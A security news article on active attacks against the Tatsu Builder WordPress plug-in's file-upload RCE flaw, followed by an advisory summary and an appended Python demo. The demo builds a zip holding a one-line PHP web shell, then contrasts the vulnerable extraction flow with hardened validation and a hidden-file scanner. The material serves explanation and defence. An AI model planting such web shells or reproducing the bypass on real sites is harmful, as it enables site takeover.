Widespread Attack on WordPress Sites Targets Tatsu Builder Plug-in
A widespread attack is underway to exploit a known RCE flaw in the Tatsu Builder WordPress plug-in, according to a new report.
A no-code page builder WordPress plug-in, Tatsu Builder, has a known remote code execution (RCE) flaw that’s under active attack, researchers report, exposing as many as 50,000 sites to takeover.
The Wordfence threat intelligence team is raising the alarm over what it calls a “widespread” attack attempting to exploit CVE-2021-25094, publicly disclosed on March 24. The vulnerability impacts both the premium and free versions of Tatsu Builder.
Because it’s not listed on WordPress.org, the team says it doesn’t know exactly how many installations the plug-in has, but estimates anywhere from 20,000 to 50,000 sites.
The Wordfence report says attacks on the plug-in first appeared on May 10, and by May 14 threat actors had already launched 5.9 million attack attempts against 1.4 million sites. That figure is far above the plug-in’s estimated install base, which indicates the exploit is being sprayed at WordPress sites indiscriminately rather than aimed only at known Tatsu Builder installations.
“When it comes to cybersecurity, most organizations give little thought to their websites,” Chris Olson, CEO of the Media Trust, said in a statement in reaction to the attacks. “The Tatsu vulnerability shows us why this is a mistake: websites — which play a key role in marketing and revenue generation — are increasingly targeted by hackers, making them a source of risk to customers and casual visitors.”
Related news
WordPress Tatsu Builder plugin versions prior to 3.3.13 suffer from an unauthenticated remote code execution vulnerability.
The Tatsu WordPress plugin before 3.3.12 exposes an add_custom_font action that can be used without prior authentication to upload a rogue zip file, which is uncompressed under WordPress's upload directory. By adding a PHP shell with a filename starting with a dot ("."), an attacker can bypass the extension control implemented in the plugin. Moreover, there is a race condition in the zip extraction process that lets the shell file live long enough on the filesystem to be callable by an attacker.
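The bypass described in the advisory above, modelled in Python as an added example; this is not code from the Tatsu plug-in, Wordfence, or the article. The page only says that a dot-prefixed PHP file slips past the plug-in's extension control and that a race exists between extraction and the check; the specific flaw reproduced here (extract first, then clean up using a directory listing that skips dotfiles) is an assumption chosen to exhibit exactly that behaviour. The font-extension whitelist, the archive contents, and all function names are constructed for the illustration. The block contrasts the vulnerable extract-then-filter ordering with a hardened version that validates every archive entry before anything is written to disk, and adds a scanner a responder can run over an uploads tree to find hidden PHP files left behind.

```python
"""Added illustration of the dot-prefixed upload bypass (not project code).

Assumption: the vulnerable flow extracts the archive into a web-served
directory and only afterwards deletes files whose extension is not on a
font whitelist, listing the directory with glob(), which skips dotfiles.
"""
import glob
import io
import os
import tempfile
import zipfile
from pathlib import PurePosixPath

# Assumed whitelist of font extensions a "custom font" upload may contain.
ALLOWED_EXT = {".ttf", ".otf", ".woff", ".woff2", ".eot", ".svg"}


def build_malicious_zip() -> bytes:
    """Constructed sample archive: one plausible font plus a dot-prefixed PHP shell."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("myfont.ttf", b"\x00\x01\x00\x00 fake font bytes")
        zf.writestr(".shell.php", b"<?php system($_GET['c']); ?>")
    return buf.getvalue()


def vulnerable_extract(zip_bytes: bytes, dest: str) -> list[str]:
    """Extract first, filter afterwards: the shell is live on disk from extractall()
    onward, and glob('*') never returns names starting with '.', so the cleanup
    loop never sees it. Returns what is actually left in dest."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
    for path in glob.glob(os.path.join(dest, "*")):
        if os.path.splitext(path)[1].lower() not in ALLOWED_EXT:
            os.remove(path)
    return sorted(os.listdir(dest))  # os.listdir does include dotfiles


def validate_entries(zip_bytes: bytes) -> list[str]:
    """Hardened check: inspect every entry name before touching disk.
    Rejects nested paths, traversal, hidden files and non-font extensions."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            p = PurePosixPath(info.filename)
            if info.is_dir() or p.is_absolute() or ".." in p.parts or len(p.parts) != 1:
                problems.append(f"{info.filename}: nested, absolute or traversal path")
            elif p.name.startswith("."):
                problems.append(f"{info.filename}: hidden file")
            elif p.suffix.lower() not in ALLOWED_EXT:
                problems.append(f"{info.filename}: disallowed extension")
    return problems


def safe_extract(zip_bytes: bytes, dest: str) -> list[str]:
    """Reject the whole archive if any entry fails validation; extract only if clean."""
    problems = validate_entries(zip_bytes)
    if problems:
        raise ValueError("; ".join(problems))
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
    return sorted(os.listdir(dest))


def find_hidden_php(root: str) -> list[str]:
    """Responder check: hidden PHP-like files anywhere under an uploads tree."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.startswith(".") and name.lower().endswith((".php", ".phtml", ".php5", ".phar")):
                hits.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(hits)


def demo() -> dict:
    """Run both flows on the constructed archive and report the outcome."""
    archive = build_malicious_zip()
    with tempfile.TemporaryDirectory() as d:
        left_on_disk = vulnerable_extract(archive, d)
        scanner_hits = find_hidden_php(d)
    with tempfile.TemporaryDirectory() as d:
        try:
            safe_extract(archive, d)
            blocked = False
        except ValueError:
            blocked = True
    return {"vulnerable_leaves": left_on_disk, "scanner_finds": scanner_hits, "hardened_blocks": blocked}


if __name__ == "__main__":
    print(demo())
```

The point of the hardened version is ordering as much as the extra checks: because validation runs on the archive's entry list before extraction, there is no window in which a rejected file exists on disk, which removes the race the advisory describes. Running a listing such as `find wp-content/uploads -name '.*.php'` (what `find_hidden_php` does in Python) is the quickest post-exploitation check on a site that was running a vulnerable version.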